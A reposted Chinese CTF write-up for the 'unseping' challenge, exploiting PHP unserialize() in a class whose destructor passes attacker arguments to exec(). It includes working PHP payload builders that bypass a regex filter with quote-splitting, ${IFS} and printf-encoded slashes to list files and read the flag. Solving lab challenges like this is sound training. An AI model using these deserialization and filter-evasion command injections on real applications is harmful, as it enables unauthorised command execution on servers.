自学内容网 自学内容网
自学内容网 > 正文

CTF(二)

🕗 发布于 2024-10-17 12:56 安全  

导言:

本文主要讲述在CTF竞赛中,web类反序列化题目unseping。。

靶场链接:攻防世界 (xctf.org.cn)

反序列化漏洞:反序列化漏洞(二)_fst反序列化 rocksdb 字段值错误-CSDN博客

打开后可以看到:

可以看到是一段php代码,根据这段代码可以看到这是一段反序列化题目。

并且在名为waf的函数中,过滤了大部分的特殊字符。

并且,是使用传参名为ctf的post类型传参。

<?php
highlight_file(__FILE__);

class ease{
    
    // 定义私有变量
    private $method;
    private $args;
    // 构造函数,接收两个参数
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    // 析构函数,当对象被销毁时调用
    function __destruct(){
        // 如果方法在数组中,则调用该方法
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    // ping方法,接收一个参数,执行exec函数
    function ping($ip){
        exec($ip, $result);
        var_dump($result);
    }

    // waf方法,接收一个参数,使用正则表达式进行过滤
    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }
 
    // __wakeup方法,当对象被反序列化时调用
    function __wakeup(){
        // 遍历args数组,对每个元素进行waf过滤
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}

// 接收POST参数ctf
$ctf=@$_POST['ctf'];
// 对ctf进行base64解码,并反序列化
@unserialize(base64_decode($ctf));
?>

此时,就知道:我们应该通过命令执行获取flag且绕过waf函数的过滤,最后将序列化的payload并进行base64编码,最后利用post请求进行发送即可

所以,使用hackbar打开,并选择post型传参。

构造payload:

<?php
 
// 定义一个类ease
class ease{
// 定义私有变量method和args
private $method;
private $args;
// 构造函数,接收两个参数method和args
function __construct($method, $args) {
    $this->method = $method;
    $this->args = $args;
}
  
}
// 创建一个ease对象,参数为"ping"和array('l""s')
$a = new ease("ping",array('l""s'));
// 将对象序列化
$b = serialize($a);
// 输出序列化后的对象
echo $b;
echo'</br>';
// 将序列化后的对象进行base64编码
echo base64_encode($b);
?>

将其运行后,可以得到payload:

使用hackbar发送后,可以看到:

flag在flag_1s_here文件夹内,查看此文件夹的payload为:

<?php
class ease{
    
    // 定义私有变量method和args
    private $method;
    private $args;
    // 构造函数,接收两个参数method和args
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
     
}
 
// 创建ease对象,参数为"ping"和array('l""s${IFS}f""lag_1s_here')
$o=new ease("ping",array('l""s${IFS}f""lag_1s_here'));
// 将对象序列化
$s = serialize($o);
// 将序列化后的对象进行base64编码
echo base64_encode($s);
?>

flag在flag_831b69012c67b35f.php文件夹内。

此时,payload为:

<?php
 
// 定义一个名为ease的类
class ease{
// 定义两个私有属性
private $method;
private $args;
// 构造函数,接受两个参数
function __construct($method, $args) {
    $this->method = $method;
    $this->args = $args;
}
  
}
// 创建一个ease对象,参数为"ping"和数组
$a = new ease("ping",array('c""at${IFS}f""lag_1s_here$(printf${IFS}"\57")f""lag_831b69012c67b35f.p""hp'));
// 将对象序列化
$b = serialize($a);
// 输出序列化后的对象
echo $b;
echo'</br>';
// 将序列化后的对象进行base64编码
echo base64_encode($b);
?>

得到flag。


原文地址:https://blog.csdn.net/2302_80280669/article/details/142982664

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!

相关文章

  • Go语言依赖注入方式

    在Go语言中,依赖注入(Dependency Injection,DI)是一种设计模式,允许你将对象的依赖关系在外部进行管理,而不是让对象自己创建或查找依赖。通俗来说就是把一个对象所需要的东西如方法或

    阅读更多2024-10-17
  • 使用 cmake 在 x86 系统中为 arm 系统交叉编译程序

    原理:在 x86 系统里使用交叉编译工具链(arm 版 gcc/g++)编译程序,然后放在 arm 系统里运行。

    阅读更多2024-10-17
  • 【Java后端】Spring vs SpringBoot

    Spring Boot 的出现,标志着 Spring 应用开发进入了一个全新的时代。它以简单、快速、高效的特点,征服了无数开发者的心,成为构建现代应用程序的首选框架。如果你还没有体验过 Spring

    阅读更多2024-10-17
  • JavaScript高级——ES6基础入门

    前言ES6(ECMAScript 6),也被称为ES2015,是JavaScript的第六个版本.它于2015年发布,并在现代JavaScript开发中扮演了重要的角色.学习方法:看千遍,不如自己动手

    阅读更多2024-10-17
  • 【无标题】网络安全(黑客)——自学2024

    网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运

    阅读更多2024-10-17
  • WPF 的组件数据绑定详解

    数据绑定是指在应用程序的 UI 层与业务逻辑层之间建立一种连接机制,以便它们之间可以相互通信和同步数据。在 WPF 中,数据绑定通过将源对象的属性绑定到目标 UI 元件的属性来实现。当源属性发生变化时

    阅读更多2024-10-17
  • Wordpress GutenKit 插件 远程文件写入致RCE漏洞复现(CVE-2024-9234)

    Wordpress GutenKit 插件 存在远程文件写入漏洞,未经身份验证的远程攻击者,可利用此漏洞远程加载远程文件上传至系统插件目录,写入后门,获取服务器权限,进而控制整个web服务器。

    阅读更多2024-10-17
  • 「漏洞复现」百易云资产管理运营系统 ufile.api.php SQL注入漏洞

    请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次

    阅读更多2024-10-17
  • phpstorm+phpstudy 配置xdebug(无需开启浏览器扩展)

    今天又被xdebug折磨了,忘记了以前咋配置了现在百度发现好多都是各种浏览器扩展而且也没有真正的用到项目上的都是测试的地址怎么样的。如果验证失败请根据内容进行修改,这里我放一下自己的验证吧,这里也困扰

    阅读更多2024-10-17
  • 9-单引号和双引号的区别在PHP

    在双引号内,字符串会解析变量和特殊字符。变量会被替换为其值,特殊字符(如换行符 \n、制表符 \t 等)会被识别并转换。:在单引号内,字符串的内容不会被解析,所有字符都被视为字面值。即使是变量名,单引

    阅读更多2024-10-17
自学内容网
Copyright © 2015-2024